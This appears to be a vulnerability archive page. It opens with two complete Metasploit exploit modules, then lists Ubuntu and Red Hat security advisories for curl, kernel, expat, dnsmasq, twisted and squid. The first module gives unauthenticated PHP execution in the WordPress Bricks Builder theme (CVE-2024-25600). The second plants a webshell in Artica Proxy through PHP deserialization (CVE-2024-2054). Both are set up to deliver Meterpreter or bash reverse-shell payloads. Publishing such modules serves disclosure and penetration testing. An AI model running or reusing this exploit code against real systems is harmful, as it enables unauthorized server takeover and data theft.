This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. Successful exploitation allows for full control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Unauthenticated RCE in Bricks Builder Theme',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in the          Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers          to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and          exploit the eval() function usage within the theme. Successful exploitation allows for full          control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.        },        'Author' => [          'Calvin Alkan', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-25600'],          ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],          ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],          ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']        ],        'DisclosureDate' => '2024-02-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },              'Type' => :php_memory            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },              'Type' => :unix_memory            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },              'Type' => :win_memory            }          ],        ],        'Privileged' => false      )    )  end  def fetch_nonce    uri = normalize_uri(target_uri.path)    res = send_request_cgi('method' => 'GET', 'uri' => uri)    return nil unless res&.code == 200    script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]*>([\s\S]*?)</script>})    return nil unless script_tag_match    script_content = script_tag_match[1]    nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)    nonce_match ? nonce_match[1] : nil  end  def exploit    nonce = fetch_nonce    fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce    print_good("Nonce retrieved: #{nonce}")    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php'),      'ctype' => 'application/json',      'data' => {        'postId' => rand(1..10000).to_s,        'nonce' => nonce,        'element' => {          'name' => 'code',          'settings' => {            'executeCode' => 'true',            'code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"          }        }      }.to_json,      'vars_get' => {        'rest_route' => '/bricks/v1/render_element'      }    )  end  def check    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')    return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code    return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'    return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'    theme_version = theme_check_code.details[:version]    print_good("Detected Bricks Builder theme version: #{theme_version}")    CheckCode::Appears  endend

WordPress Bricks Builder Theme 1.9.6 Remote Code Execution

A command injection vulnerability in Artica Proxy appliance versions 4.50 and 4.40 allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40          allows remote attackers to run arbitrary commands via unauthenticated HTTP request.          The Artica Proxy administrative web application will deserialize arbitrary PHP objects          supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Jaggar Henry of KoreLogic Inc.' # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-2054'],          ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'],          ['PACKETSTORM', '177482']        ],        'DisclosureDate' => '2024-03-05',        'Platform' => ['php', 'unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 9000        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptEnum.new('COMMAND',                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])    ])  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    @webshell_full_path = "/usr/share/artica-postfix/wizard/#{@webshell_name}"    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    # Upload webshell with PHP payload    if target['Type'] == :php      php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    else      php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"    end    php_payload_len = php_payload.length    webshell_full_path_len = @webshell_full_path.length    final_payload = "O:19:\"Net_DNS2_Cache_File\":4:{s:10:\"cache_file\";s:#{webshell_full_path_len}:\"#{@webshell_full_path}\";s:16:\"cache_serializer\";s:4:\"json\";s:10:\"cache_size\";i:9999999999;s:10:\"cache_data\";a:1:{s:#{php_payload_len}:\"#{php_payload}\";a:2:{s:10:\"cache_date\";i:0;s:3:\"ttl\";i:9999999999;}}}"    final_payload_b64 = Base64.strict_encode64(final_payload)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wizard', 'wiz.wizard.progress.php'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        'build-js' => final_payload_b64      }    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # Check if target is an Artica Proxy appliance    # Search for the Artica Version tag on the login page    html = res.get_html_document    unless html.blank?      version_match = html.text.match(/Artica.{1,2}\d\.\d\d/)      return CheckCode::Unknown('No Artica version found.') if version_match.nil?      version = version_match[0].split(' ')      if version.count > 1 && Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')        return CheckCode::Vulnerable("Artica version: #{version[1]}")      else        return CheckCode::Safe("Artica version: #{version[1]}")      end    end    CheckCode::Unknown  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = upload_webshell    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500    register_file_for_cleanup(@webshell_full_path)    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Artica Proxy Unauthenticated PHP Deserialization

Ubuntu Security Notice 6718-1 - Dan Fandrich discovered that curl would incorrectly use the default set of protocols when a parameter option disabled all protocols without adding any, contrary to expectations. This issue only affected Ubuntu 23.10. It was discovered that curl incorrectly handled memory when limiting the amount of headers when HTTP/2 server push is allowed. A remote attacker could possibly use this issue to cause curl to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6718-1  
March 27, 2024

curl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in curl.

Software Description:  
- curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Dan Fandrich discovered that curl would incorrectly use the default set of  
protocols when a parameter option disabled all protocols without adding  
any, contrary to expectations. This issue only affected Ubuntu 23.10.  
(CVE-2024-2004)

It was discovered that curl incorrectly handled memory when limiting the  
amount of headers when HTTP/2 server push is allowed. A remote attacker  
could possibly use this issue to cause curl to consume resources, leading  
to a denial of service. (CVE-2024-2398)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   curl                            8.2.1-1ubuntu3.3  
   libcurl3-gnutls                 8.2.1-1ubuntu3.3  
   libcurl3-nss                    8.2.1-1ubuntu3.3  
   libcurl4                        8.2.1-1ubuntu3.3

Ubuntu 22.04 LTS:  
   curl                            7.81.0-1ubuntu1.16  
   libcurl3-gnutls                 7.81.0-1ubuntu1.16  
   libcurl3-nss                    7.81.0-1ubuntu1.16  
   libcurl4                        7.81.0-1ubuntu1.16

Ubuntu 20.04 LTS:  
   curl                            7.68.0-1ubuntu2.22  
   libcurl3-gnutls                 7.68.0-1ubuntu2.22  
   libcurl3-nss                    7.68.0-1ubuntu2.22  
   libcurl4                        7.68.0-1ubuntu2.22

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6718-1  
   CVE-2024-2004, CVE-2024-2398

Package Information:  
   https://launchpad.net/ubuntu/+source/curl/8.2.1-1ubuntu3.3  
   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.16  
   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.22

Ubuntu Security Notice USN-6718-1

Red Hat Security Advisory 2024-1533-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1533.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:1533-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1533  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2024-0565  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

Bug Fix(es):

* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22083)

* kernel-rt: update RT source tree to the latest RHEL-9.2.z7 Batch (JIRA:RHEL-28866)

* [RHEL9.3 nightly] NMI panic sometimes fails to start the 2nd kernel for kdump (JIRA:RHEL-24448)

* kernel-rt: kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (JIRA:RHEL-26382)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0565

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1533-03

Red Hat Security Advisory 2024-1532-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1532.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security and bug fix update  
Advisory ID:        RHSA-2024:1532-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1532  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2024-0565  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

Bug Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22081)

* dpll: fix unordered unbind/bind registerer issues (JIRA:RHEL-25714)

* update mm to upstream v6.0 (JIRA:RHEL-28164)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (JIRA:RHEL-26378)

* ice: support features on new E810T variants  (JIRA:RHEL-28589)

* xfs_growfs: XFS_IOC_FSGROWFSDATA xfsctl failed: No space left on device (RHEL9) (JIRA:RHEL-28689)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0565

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1532-03

Red Hat Security Advisory 2024-1530-03 - An update for expat is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1530.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: expat security update  
Advisory ID:        RHSA-2024:1530-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1530  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-52425  
====================================================================

Summary: 

An update for expat is now available for Red Hat Enterprise Linux 9.

'Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)

* expat: XML Entity Expansion (CVE-2024-28757)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-52425

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.3_release_notes/index  
https://bugzilla.redhat.com/show_bug.cgi?id=2262877  
https://bugzilla.redhat.com/show_bug.cgi?id=2268766

Red Hat Security Advisory 2024-1530-03

Red Hat Security Advisory 2024-1522-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1522.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:1522-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1522Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1522-03

Red Hat Security Advisory 2024-1518-03 - An update for python-twisted is now available for Red Hat OpenStack Platform 16.2.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1518.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 16.2.6 (python-twisted) security updateAdvisory ID:        RHSA-2024:1518-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1518Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-46137====================================================================Summary: An update for python-twisted is now available for Red Hat OpenStack Platform 16.2 (Train).Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Twisted is a networking engine written in Python, supporting numerous protocols. It contains a web server, numerous chat clients, chat servers, mail servers and more.Security Fix(es):* python-twisted: disordered HTTP pipeline response in twisted.web (CVE-2023-46137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46137References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2246264

Red Hat Security Advisory 2024-1518-03

Red Hat Security Advisory 2024-1516-03 - An update for python-twisted is now available for Red Hat OpenStack Platform 16.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1516.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 16.1.9 (python-twisted) security updateAdvisory ID:        RHSA-2024:1516-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1516Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-46137====================================================================Summary: An update for python-twisted is now available for Red Hat OpenStack Platform 16.1 (Train).Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Twisted is a networking engine written in Python, supporting numerous protocols. It contains a web server, numerous chat clients, chat servers, mail servers and more.Security Fix(es):* python-twisted: disordered HTTP pipeline response in twisted.web (CVE-2023-46137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46137References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2246264

Red Hat Security Advisory 2024-1516-03

Red Hat Security Advisory 2024-1515-03 - An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1515.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security and bug fix updateAdvisory ID:        RHSA-2024:1515-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1515Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2024-25111====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP and HTTP data objects.Security Fix(es):* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25111References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268366

Tag

#vulnerability